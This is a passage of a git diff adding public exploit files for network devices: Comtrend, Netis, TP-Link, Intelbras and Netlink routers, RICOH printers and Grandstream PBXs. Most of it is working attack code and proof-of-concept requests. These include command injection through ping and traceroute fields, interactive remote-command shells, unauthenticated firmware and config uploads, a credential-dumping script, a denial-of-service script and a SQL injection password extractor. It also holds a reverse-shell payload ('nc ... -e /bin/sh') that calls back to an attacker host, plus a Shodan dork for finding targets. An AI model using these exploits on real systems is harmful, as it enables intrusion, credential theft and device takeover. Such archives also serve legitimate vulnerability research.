+my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);                      
+my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+print "[ >>  $_ => ", $request->header($_), "\n" for  $request->header_field_names;
+print "[ <<  $_ => ", $response->header($_), "\n" for  $response->header_field_names;
+print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
+my $gzipped = $response->content();
+my $config = gunzip($gzipped);
+print "[ \n";
+if ($cmd =~ /show/) {
+        print "[ >> Configuration dump...\n[\n";
+        print  "[ ", $_, "\n" for split(/\n/,$config);
+        exit;
+} else {
+        print  "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
+        print  "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
+        exit;
+}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48142.txt b/exploits/hardware/webapps/48142.txt
new file mode 100644
index 000000000..36f8d9190
--- /dev/null
+++ b/exploits/hardware/webapps/48142.txt
@@ -0,0 +1,179 @@
+# Title: Comtrend VR-3033 - Authenticated Command Injection
+# Date: 2020-02-26
+# Author: Author : Raki Ben Hamouda
+# Vendor: https://us.comtrend.com
+# Product link: https://us.comtrend.com/products/vr-3030/
+# CVE: CVE-2020-10173
+
+The Comtrend VR-3033 is prone to Multiple Authenticated Command Injection
+vulnerability via ping and traceroute diagnostic page.
+Remote attackers are able to get full control and compromise the network
+managed by the router.
+
+Note : This bug may exist in other Comtrend routers .
+===============================================
+Product Page :
+https://us.comtrend.com/products/vr-3030/
+
+Firmware version :
+DE11-416SSG-C01_R02.A2pvI042j1.d26m
+
+Bootloader (CFE) Version :
+ 1.0.38-116.228-1
+
+To reproduce the vulnerability attacker has to access the interface at
+least with minimum privilege.
+
+1- Open interface
+2- click on 'Diagnostic' tab on top.
+3- click then on 'Ping' or traceroute
+4- on the text input, type 'google.fr;ls - l'
+5 - a list of folder names should appear.
+#############################
+POC session Logs :
+
+GET /ping.cgi?pingIpAddress=google.fr;ls&sessionKey=1039230114 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:73.0)
+Gecko/20100101 Firefox/73.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Authorization: Basic dXNlcjp1c2Vy
+Connection: close
+Referer: http://192.168.0.1/pingview.cmd
+Upgrade-Insecure-Requests: 1
+
+
+
+=====================++RESPONSE++=====================
+
+HTTP/1.1 200 Ok
+Server: micro_httpd
+Cache-Control: no-cache
+Date: Fri, 02 Jan 1970 00:00:26 GMT
+Content-Type: text/html
+Connection: close
+
+<html><head>
+<meta HTTP-EQUIV="Pragma" CONTENT='no-cache'>
+<link rel="stylesheet" href='stylemain.css' type='text/css'>
+<link rel="stylesheet" href='colors.css' type='text/css'>
+<script language="javascript" src="util.js">
+</script>
+<script language="javascript">
+<!-- hide
+
+function btnPing() {
+var loc = 'ping.cgi?';
+
+with ( document.forms[0] ) {
+if (pingIpAddress.value.length == 0 ) {
+return;
+
+}
+
+loc += 'pingIpAddress=' + pingIpAddress.value;
+   loc += '&sessionKey=1592764063';
+}
+
+var code = 'location="' + loc + '"';
+   eval(code);
+}
+
+// done hiding -->
+
+</script>
+</head>
+<body>
+<blockquote>
+<form>
+<b>Ping&nbsp;</b><br>
+<br> Send ICMP ECHO_REQUEST packets to network hosts.<br>
+<br><table border="0" cellpadding="0" cellspacing="0"><tr>
+<td width="170">Ping IP Address / Hostname:</td>
+<td width="170"><input type='text' name='pingIpAddress'
+onkeydown="if(event.keyCode == 13){event.returnValue = false;}"></td>
+<td width=""><input type='button' onClick='btnPing()' value='Ping'></td>
+</tr></table><br>
+   <tr>
+      <td>bin
+</td><br>
+   </tr>
+   <tr>
+      <td>bootfs
+</td><br>
+   </tr>
+   <tr>
+      <td>data
+</td><br>
+   </tr>
+   <tr>
+      <td>debug
+</td><br>
+   </tr>
+   <tr>
+      <td>dev
+</td><br>
+   </tr>
+   <tr>
+      <td>etc
+</td><br>
+   </tr>
+   <tr>
+      <td>lib
+</td><br>
+   </tr>
+   <tr>
+      <td>linuxrc
+</td><br>
+   </tr>
+   <tr>
+      <td>mnt
+</td><br>
+   </tr>
+   <tr>
+      <td>opt
+</td><br>
+   </tr>
+   <tr>
+      <td>proc
+</td><br>
+   </tr>
+   <tr>
+      <td>sbin
+</td><br>
+   </tr>
+   <tr>
+      <td>sys
+</td><br>
+   </tr>
+   <tr>
+      <td>tmp
+</td><br>
+   </tr>
+   <tr>
+      <td>usr
+</td><br>
+   </tr>
+   <tr>
+      <td>var
+</td><br>
+   </tr>
+   <tr>
+      <td>webs
+</td><br>
+   </tr>
+</form>
+</blockquote>
+</body>
+</html>
+
+##Same bug with the same way we exploited in ping function can be exploited
+the same way in traceroute function.
+===========
+##Timeline :
+*Bug sent to vendor : 17-02-2020
+*No Response after 10 days
+* Public disclosure: 27-02-020
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48149.py b/exploits/hardware/webapps/48149.py
new file mode 100755
index 000000000..24f009c90
--- /dev/null
+++ b/exploits/hardware/webapps/48149.py
@@ -0,0 +1,65 @@
+# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution 
+# Exploit Author: Elias Issa
+# Vendor Homepage: http://www.netis-systems.com
+# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75
+# Date: 2020-02-11
+# Version: WF2419 V2.2.36123 => V2.2.36123
+# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123
+# CVE : CVE-2019-19356
+
+
+# Proof of Concept: python netis_rce.py http://192.168.1.1 "ls"
+
+#!/usr/bin/env python
+import argparse
+import requests
+import json
+
+def exploit(host,cmd):
+	# Send Payload
+	headers_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0',  
+			'Content-Type': 'application/x-www-form-urlencoded'}
+	post_data="mode_name=netcore_set&tools_type=2&tools_ip_url=|+"+cmd+"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0"
+	vulnerable_page = host + "/cgi-bin-igd/netcore_set.cgi"
+	req_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value)
+	print('[+] Payload sent')
+	try :
+		json_data = json.loads(req_payload.text)
+		if json_data[0] == "SUCCESS":
+			print('[+] Exploit Sucess')
+			# Get Command Result
+			print('[+] Getting Command Output\n')
+			result_page = host + "/cgi-bin-igd/netcore_get.cgi"
+			post_data = "mode_name=netcore_get&no=no" 
+			req_result = requests.post(result_page, data=post_data, headers=headers_value)
+			json_data = json.loads(req_result.text)
+			results = json_data["tools_results"]
+			print results.replace(';', '\n')
+		else:
+			print('[-] Exploit Failed')
+	except:
+  		print("[!] You might need to login.") 
+
+# To be implemented
+def login(user, password):
+	print('To be implemented')
+
+def main():
+    host = args.host
+    cmd = args.cmd
+    user = args.user
+    password = args.password
+    #login(user,password)
+    exploit(host,cmd)
+
+if __name__ == "__main__":
+    ap = argparse.ArgumentParser(
+            description="Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]")
+    ap.add_argument("host", help="URL (Example: http://192.168.1.1).")
+    ap.add_argument("cmd", help="Command to run.")
+    ap.add_argument("-u", "--user", help="Admin username (Default: admin).",
+            default="admin")
+    ap.add_argument("-p", "--password", help="Admin password (Default: admin).",
+            default="admin")
+    args = ap.parse_args()
+    main()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48152.txt b/exploits/hardware/webapps/48152.txt
new file mode 100644
index 000000000..f3b441e66
--- /dev/null
+++ b/exploits/hardware/webapps/48152.txt
@@ -0,0 +1,20 @@
+# Exploit Title: TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)
+# Date: 2019-11-20
+# Exploit Author: Elber Tavares
+# Vendor Homepage: https://www.tp-link.com/
+# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
+# Version: TL-WR849N 0.9.1 4.16
+# Tested on: linux, windows
+# CVE : CVE-CVE-2019-19143
+
+Uploading new firmware without access to the panel
+
+REFS:
+ https://github.com/ElberTavares/routers-exploit/tp-link
+ https://fireshellsecurity.team/hack-n-routers/
+
+
+Poc:
+curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:
+http://TARGET/mainFrame.htm" -F data=@conf.bin
+http://TARGET/cgi/confup
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48155.py b/exploits/hardware/webapps/48155.py
new file mode 100755
index 000000000..f08db623a
--- /dev/null
+++ b/exploits/hardware/webapps/48155.py
@@ -0,0 +1,62 @@
+# Exploit Title: TP LINK TL-WR849N - Remote Code Execution
+# Date: 2019-11-20
+# Exploit Author: Elber Tavares
+# Vendor Homepage: https://www.tp-link.com/
+# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
+# Version: TL-WR849N 0.9.1 4.16
+# Tested on: linux, windows
+# CVE : CVE-2020-9374
+
+
+import requests
+
+def output(headers,cookies):
+    url = 'http://192.168.0.1/cgi?1'
+    data = ''
+    data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a'
+    data += 'diagnosticsState\x0d\x0a'
+    data += 'X_TP_HopSeq\x0d\x0a'
+    data += 'X_TP_Result\x0d\x0a'
+    r = requests.post(url,data=data,headers=headers,cookies=cookies)
+    saida = r.text
+    filtro = saida.replace(': Name or service not known','')
+    filtro = filtro.replace('[0,0,0,0,0,0]0','')
+    filtro = filtro.replace('diagnosticsState=','')
+    filtro = filtro.replace('X_TP_HopSeq=0','')
+    filtro = filtro.replace('X_TP_Result=','')
+    print(filtro[:-8])
+
+def aceppt(headers,cookies):
+    url = 'http://192.168.0.1/cgi?7'
+    data = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a'
+    r = requests.post(url,data=data,headers=headers,cookies=cookies)
+    output(headers,cookies)
+
+
+def inject(command,headers,cookies):
+    url = 'http://192.168.0.1/cgi?2'
+    data = ''
+    data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\x0d\x0a'
+    data += 'maxHopCount=20\x0d\x0a'
+    data += 'timeout=5\x0d\x0a'
+    data += 'numberOfTries=1\x0d\x0a'
+    data += 'host=\"$('+command+')\"\x0d\x0a'
+    data += 'dataBlockSize=64\x0d\x0a'
+    data += 'X_TP_ConnName=ewan_pppoe\x0d\x0a'
+    data += 'diagnosticsState=Requested\x0d\x0a'
+    data += 'X_TP_HopSeq=0\x0d\x0a'
+    r = requests.post(url,data=data,headers=headers,cookies=cookies)
+    aceppt(headers,cookies)
+
+
+
+def main():
+    cookies = {"Authorization": "Basic REPLACEBASE64AUTH"}
+    headers = {'Content-Type': 'text/plain',
+      'Referer': 'http://192.168.0.1/mainFrame.htm'}
+    while True:
+        command = input('$ ')
+        inject(command,headers,cookies)
+
+
+main()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48158.txt b/exploits/hardware/webapps/48158.txt
new file mode 100644
index 000000000..72dce80e5
--- /dev/null
+++ b/exploits/hardware/webapps/48158.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)
+# Date: 2019-11-20
+# Exploit Author: Elber Tavares
+# Vendor Homepage:  https://www.intelbras.com/
+# Software Link:  http://en.intelbras.com.br/node/1033
+# Version: Intelbras Wireless N 150Mbps - WRN240
+# Tested on: linux, windows
+# CVE: CVE-2019-19142
+
+Intelbras WRN240 devices do not require authentication to replace the
+firmware via a POST request to the incoming/Firmware.cfg URI.
+
+REFS:
+ https://fireshellsecurity.team/hack-n-routers/
+ https://github.com/ElberTavares/routers-exploit/
+
+
+Poc:
+curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:
+http://192.168.0.1/userRpm/BakNRestoreRpm.htm" -F data=@config.bin
+http://192.1680.1/incoming/RouterBakCfgUpload.cfg
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48161.txt b/exploits/hardware/webapps/48161.txt
new file mode 100644
index 000000000..db85355ff
--- /dev/null
+++ b/exploits/hardware/webapps/48161.txt
@@ -0,0 +1,73 @@
+# Exploit Title: RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection
+# Discovery by: Paulina Girón
+# Discovery Date: 2020-03-02
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/re2/model/sp52s/sp52s.htm
+# Product Version: RICOH Aficio SP 5200S Printer
+# Vulnerability Type: Code Injection - HTML Injection
+
+# Steps to Produce the HTML Injection:
+
+#1.- HTTP POST Request 'adrsGetUser.cgi':
+
+POST /web/entry/es/address/adrsGetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+Content-Length: 447
+Cache-Control: max-age=0
+Origin: http://xxx.xxx.xxx.xxx
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsList.cgi
+Accept-Encoding: gzip, deflate
+Accept-Language: es-ES,es;q=0.9
+Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
+Connection: close
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=13&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00005=ADRS_ENTRY_USER&00006=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00009=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+Date: Mon, 02 Mar 2020 15:15:59 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 15:15:59 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
+
+
+
+#2.- HTTP POST Request 'adrsSetUser.cgi':
+
+POST /web/entry/es/address/adrsSetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+Content-Length: 611
+Cache-Control: max-age=0
+Origin: http://xxx.xxx.xxx.xxx
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsGetUser.cgi
+Accept-Encoding: gzip, deflate
+Accept-Language: es-ES,es;q=0.9
+Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
+Connection: close
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00012&entryNameIn=prueba&entryDisplayNameIn=prueba&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+Date: Mon, 02 Mar 2020 15:17:10 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 15:17:10 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48164.txt b/exploits/hardware/webapps/48164.txt
new file mode 100644
index 000000000..fb32a1f83
--- /dev/null
+++ b/exploits/hardware/webapps/48164.txt
@@ -0,0 +1,73 @@
+# Exploit Title: RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection
+# Discovery by: Olga Villagran
+# Discovery Date: 2020-03-02
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/rc3/model/sp52s/sp52s.htm?lang=es
+# Product Version: RICOH Aficio SP 5210SF Printer
+# Vulnerability Type: Code Injection - HTML Injection
+
+# Steps to Produce the HTML Injection:
+
+#1.- HTTP POST Request 'adrsGetUser.cgi':
+
+POST /web/entry/en/address/adrsGetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsList.cgi
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 402
+Connection: close
+Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
+Upgrade-Insecure-Requests: 1
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=8&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER&00012=ADRS_ENTRY_USER
+
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+
+Date: Mon, 02 Mar 2020 22:22:44 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 22:22:44 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
+
+
+#2.- HTTP POST Request 'adrsSetUser.cgi':
+
+
+POST /web/entry/en/address/adrsSetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsGetUser.cgi
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 607
+Connection: close
+Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
+Upgrade-Insecure-Requests: 1
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00005&entryNameIn=test&entryDisplayNameIn=test&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
+
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+
+Date: Mon, 02 Mar 2020 22:23:10 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 22:23:10 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48225.txt b/exploits/hardware/webapps/48225.txt
new file mode 100644
index 000000000..7a9481ea9
--- /dev/null
+++ b/exploits/hardware/webapps/48225.txt
@@ -0,0 +1,66 @@
+# Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution
+# Date: 2020-03-17
+# Exploit Author: shellord
+# Vendor Homepage: https://www.netlink-india.com/
+# Version: 1.0.11
+# Tested on: Windows 10
+# CVE: N/A
+
+Exploit :
+
+curl -L -d "target_addr=;ls /&waninf=1_INTERNET_R_VID_154"
+http://TARGETIP/boaform/admin/formPing
+
+Response :
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+<!--ϵͳĬģ-->
+<html>
+<head>
+<title>PINGԽ</title>
+<meta http-equiv=pragma content=no-cache>
+<meta http-equiv=refresh content="2">
+<meta http-equiv=cache-control content="no-cache, must-revalidate">
+<meta http-equiv=content-type content="text/html; charset=gbk">
+<meta http-equiv=content-script-type content=text/javascript>
+<!--ϵͳcss-->
+<style type=text/css>
+@import url(/style/default.css);
+</style>
+<!--ϵͳű-->
+<script language="javascript" src="common.js"></script>
+</head>
+
+<!-------------------------------------------------------------------------------------->
+<!--ҳ-->
+<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"
+alink="#000000" link="#000000" vlink="#000000">
+        <blockquote>
+        <form>
+        <div align="left" style="padding-left:20px;"><br>
+        <div align="left"><b>Finish</b>
+        <br><br>
+        </div>
+        <pre>
+bin
+dev
+etc
+home
+image
+lib
+mnt
+proc
+sbin
+sys
+tmp
+usr
+var
+        </pre>
+
+                <input type=button value="back"
+onClick=window.location.replace("/diag_ping_admin_en.asp")>
+        </div>
+        </form>
+        </blockquote>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48247.py b/exploits/hardware/webapps/48247.py
new file mode 100755
index 000000000..841518aad
--- /dev/null
+++ b/exploits/hardware/webapps/48247.py
@@ -0,0 +1,120 @@
+# Exploit Title: UCM6202 1.0.18.13 - Remote Command Injection
+# Date: 2020-03-23
+# Exploit Author: Jacob Baines
+# Vendor: http://www.grandstream.com
+# Product Link: http://www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series
+# Tested on: UCM6202 1.0.18.13
+# CVE : CVE-2020-5722
+# Shodan Dork: ssl:"Grandstream" "Set-Cookie: TRACKID"
+# Advisory: https://www.tenable.com/security/research/tra-2020-15
+#
+# Sample output:
+# albinolobster@ubuntu:~$ python3 pbx_sploit.py --rhost 192.168.2.1 --lhost 192.168.2.107
+# [+] Sending getInfo request to  https://192.168.2.1:8089/cgi
+# [+] Remote target info:
+# -> Model:  UCM6202
+# -> Version:  1.0.18.13
+# [+] Vulnerable version!
+# [+] Sending exploit. Reverse shell to 192.168.2.107:1270
+#
+# albinolobster@ubuntu:~$ nc -lvp 1270
+# Listening on [] (family 2, port)
+# Connection from _gateway 41675 received!
+# whoami
+# root
+# uname -a
+# Linux UCM6202 3.0.35 #1 SMP PREEMPT Thu Jul 5 15:56:51 CST 2018 armv7l GNU/Linux
+##
+
+import os
+import re
+import sys
+import json
+import argparse
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+top_parser = argparse.ArgumentParser(description='')
+top_parser.add_argument('--rhost', action="store", dest="rhost",
+required=True, help="The remote host to connect to")
+top_parser.add_argument('--rport', action="store", dest="rport", type=int,
+help="The remote port to connect to", default=8089)
+top_parser.add_argument('--lhost', action="store", dest="lhost",
+required=True, help="The local host to connect back to")
+top_parser.add_argument('--lport', action="store", dest="lport", type=int,
+help="The local port to connect back to", default=1270)
+args = top_parser.parse_args()
+
+
+url = 'https://' + args.rhost + ':' + str(args.rport) + '/cgi'
+print('[+] Sending getInfo request to ', url)
+
+try:
+    resp = requests.post(url=url, data='action=getInfo', verify=False)
+except Exception:
+    print('[-] Error connecting to remote target')
+    sys.exit(1)
+
+if resp.status_code != 200:
+    print('[-] Did not get a 200 OK on getInfo request')
+    sys.exit(1)
+
+if resp.text.find('{ "response":') != 0:
+    print('[-] Unexpected response')
+    sys.exit(1)
+
+try:
+    parsed_response = json.loads(resp.text)
+except Exception:
+    print('[-] Unable to parse json response')
+    sys.exit(1)
+
+print('[+] Remote target info: ')
+print('\t-> Model: ', parsed_response['response']['model_name'])
+print('\t-> Version: ', parsed_response['response']['prog_version'])
+
+match = re.match('^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)$',
+parsed_response['response']['prog_version'])
+if not match:
+    print('[-] Failed to extract the remote targets version')
+    sys.exit(1)
+
+major = int(match[1])
+minor = int(match[2])
+point = int(match[3])
+patch = int(match[4])
+
+if (major > 1) or (major == 1 and minor > 0) or (major == 1 and minor == 0
+and point > 19) or (major == 1 and minor == 0 and point == 19 and patch >=
+20):
+    print('[-] Unaffected version')
+    sys.exit(1)
+else:
+    print('[+] Vulnerable version!')
+
+print('[+] Sending exploit. Reverse shell to %s:%i' % (args.lhost,
+args.lport))
+try:
+    exploit = 'admin\' or 1=1--`;`nc${IFS}' + args.lhost + '${IFS}' +
+str(args.lport) + '${IFS}-e${IFS}/bin/sh`;`'
+    resp = requests.post(url=url,
+data='action=sendPasswordEmail&user_name=' + exploit, verify=False)
+except Exception as err:
+    print('[-] Failed to send payload')
+    sys.exit(1)
+
+if resp.status_code != 200:
+    print('[-] Did not get a 200 OK on sendPasswordEmail request')
+    sys.exit(1)
+
+try:
+    parsed_response = json.loads(resp.text)
+except Exception:
+    print('[-] Unable to parse json response')
+    sys.exit(1)
+
+if parsed_response['status'] == 0:
+    print('[+] Success! Clean exit.')
+else:
+    print('[-] Something bad happened.')
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48255.py b/exploits/hardware/webapps/48255.py
new file mode 100755
index 000000000..7c0761e12
--- /dev/null
+++ b/exploits/hardware/webapps/48255.py
@@ -0,0 +1,42 @@
+# Exploit Title: TP-Link Archer C50 3 - Denial of Service (PoC)
+# Date: 2020-01-25
+# Exploit Author: thewhiteh4t
+# Vendor Homepage: https://www.tp-link.com/
+# Version: TP-Link Archer C50 v3 Build 171227
+# Tested on: Arch Linux x64
+# CVE: CVE-2020-9375
+# Description: https://thewhiteh4t.github.io/2020/02/27/CVE-2020-9375-TP-Link-Archer-C50-v3-Denial-of-Service.html
+
+import time
+import socket
+
+ip = '192.168.0.1'
+port = 80
+
+print('[+] IP   : ' + ip)
+print('[+] Port : ' + str(port))
+
+for i in range(2):
+	time.sleep(1)
+	try:
+		print('[+] Initializing Socket...')
+		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		s.settimeout(5)
+		print('[!] Connecting to target...')
+		s.connect((ip, port))
+		header = 'GET / HTTP/1.1\r\nHost: {}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\r\nReferer: thewhiteh4t\r\n\r\n'.format(ip)
+		header = header.encode()
+		print('[!] Sending Request...')
+		s.sendall(header)
+		print('[!] Disconnecting Socket...')
+		s.close()
+		if i == 1:
+			print('[-] Exploit Failed!')
+			break
+	except Exception as e:
+		if 'Connection refused' in str(e):
+			print('[+] Connection Refused...Exploit Successful!')
+			break
+		else:
+			print('[-] Exploit Failed!')
+			break
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48270.py b/exploits/hardware/webapps/48270.py
new file mode 100755
index 000000000..bc7b03939
--- /dev/null
+++ b/exploits/hardware/webapps/48270.py
@@ -0,0 +1,111 @@
+# Exploit Title: Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection
+# Date: 2020-03-30
+# Exploit Author: Jacob Baines
+# Vendor Homepage: http://www.grandstream.com/
+# Software Link: http://www.grandstream.com/support/firmware/ucm62xx-official-firmware
+# Version: 1.0.20.20 and below
+# Tested on: Grandstream UCM6202 1.0.20.20
+# CVE : CVE-2020-5726
+# Grandstream UCM6200 Series CTI Interface SQL Injection Password Disclosure
+# Advisory: https://www.tenable.com/security/research/tra-2020-17
+# Sample output:
+#
+# albinolobster@ubuntu:~$ python3 cti_injection.py --rhost 192.168.2.1
+--user lolwat
+# [+] Reaching out to 192.168.2.1:8888
+# [+] Password length 9
+# [+] The password is LabPass1%
+
+import sys
+import time
+import json
+import struct
+import socket
+import argparse
+
+def send_cti_with_length(sock, payload):
+    to_send = struct.pack('>I', len(payload))
+    to_send = to_send + payload
+    sock.sendall(to_send)
+
+    return recv_cti_with_length(sock)
+
+def recv_cti_with_length(sock):
+    length = sock.recv(4)
+    length = struct.unpack('>I', length)[0]
+    response = sock.recv(length)
